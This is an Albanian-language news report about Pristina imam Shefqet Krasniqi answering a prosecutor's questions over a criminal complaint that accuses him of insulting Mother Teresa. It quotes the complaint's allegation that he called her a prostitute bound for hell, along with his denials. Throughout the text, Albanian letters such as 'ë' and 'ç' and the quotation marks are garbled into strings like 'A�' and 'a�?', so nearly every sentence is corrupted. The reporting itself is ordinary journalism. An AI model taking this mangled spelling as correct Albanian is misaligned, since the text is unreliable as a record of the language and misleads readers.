PA�r fyerjet publike qA� i ka bA�rA� ndaj NA�nA� TerezA�s disa vite mA� parA�, imami i XhamisA� sA� Madhe nA� PrishtinA�, Shefqet Krasniqi, tA� martA�n pA�r dy orA� radhazi A�shtA� pA�rgjigjur nA� pyetjet e prokurorit komunal tA� PrishtinA�s, Valdet Gashit.

Shefqet Krasniqi ka pranuar se ka komentuar nA� lidhje me Gonxhe Bojagjiun para xhematit nA� XhaminA� e Madhe, por thotA� se nuk e ka fyer NA�nA� TerezA�n siA� pretendohet nA� kallA�zimin penal, shkruan a�?ZA�ria�?.

Mohimet se ka fyer NA�nA� TerezA�n, Krasniqi i ka bA�rA� nA� kuadA�r tA� hetimeve qA� po bA�hen qA� mA� shumA� se tri vjet nga ushtrimi i kallA�zimit penal nA� ProkurorinA� Komunale nga shkrimtari Qerim Ujkani, avokatA�t Bajram Krasniqi e Zef Prenaj, si dhe Adem Nimani.

KatA�r qytetarA�t nA� kallA�zimin penal pretendojnA� se imami i XhamisA� sA� Madhe me deklarimet publike nA� xhami e nA� gazeta ditore, ka kryer veprA�n penale tA� nxitjes sA� urrejtjes, pA�rA�arjes ose mosdurimit kombA�tar, veprA�n penale tA� keqtrajtimit gjatA� ushtrimit tA� detyrA�s zyrtare, veprA�n penale tA� fyerjes si dhe veprA�n penale tA� shpifjes.

a�?Ai ka ofenduar shqiptarizmin dhe tA�rA� popujt e botA�s duke thA�nA� se: NA�nA� Tereza e ka vendin nA� ferr, ku tA� lumturA�n – Nobelisten NA�nA�n TerezA�, Gonxhe Bojagjiun e quan prostitutA�, cila ka ndA�rruar shumA� meshkuj dhe ka ngrA�nA� e ka pirA� pa paraa�?, thuhet mes tjerash nA� kallA�zimin penal, njA� kopje tA� tA� cilit e posedon gazeta.

Duke u pA�rgjigjur nA� kA�to pretendime tA� kallA�zimit penal, imami Krasniqi thotA� se ka folur pA�r NA�nA� TerezA�n qysh nA� vitin 2004 nA� XhaminA� e Madhe nA� PrishtinA� dhe atA� pas njA� pyetje tA� bA�rA� nga njA� besimtar gjatA� ligjA�ratave tA� mbrA�mjes qA� i ka mbajtur nA� xhaminA� qA� drejton, A�do tA� mA�rkurA�.

NA� pyetjen e prokurorit se A�ka ka dashur tA� thotA� vetA� Krasniqi me a�?burra cilin do ta ndA�rrojA�a�?, imami i XhamisA� sA� Madhe ka thA�nA� se a�?A�shtA� rregull i pA�rgjithshA�m i tA� mirave tA� cilat i ka bA�rA� njA� person jomysliman nA� kA�tA� dynja, e Allahu ia kthen tA� mirat nA� atA� dynja, ia hap dyert e dA�frimit, kA�naqA�sisA�, plotA�simit tA� dA�shirave etj.a�?.

a�?KA�tA� e kam thA�nA� nA� kontest tA� pA�rgjithshA�m, pA�rndryshe kjo nuk do tA� duhej tA� vlente pA�r tA� (NA�nA� TerezA�n), sepse ajo e ka tA� ndaluar martesA�n me fe tA� saj e lA�re mA� amoralitetin. Andaj, nuk A�shtA� e vA�rtetA� qA� e kam akuzuar pA�r moral, pA�r xhehenem po, pA�r amoralitet joa�?, ka thA�nA� Krasniqi.

Pas publikimit tA� kA�tyre deklaratave qA� ai i kishte dhA�nA� fillimisht nA� xhami e mA� pas edhe ishin publikuar nga mediat, Krasniqi ka thA�nA� se i ka kA�rkuar falje KishA�s Katolike, ngase, siA� ka thA�nA� ai, ka ndjerA� obligim moral nA�se ata janA� ndier tA� fyer. PA�r kA�tA� A�A�shtje Krasniqi kishte dhA�nA� pA�rgjigje edhe nA� BashkA�sinA� Islame.

MegjithA�se ndaj tij A�shtA� ngritur kallA�zimi penal, Krasniqi thotA� se nuk ka gabuar pA�r A�kado qA� ka deklaruar edhe nA� 2004-A�n e edhe mA� vonA�. Deklaratat e tij ai ka thA�nA� se burojnA� nga Ajetet Kuranore.
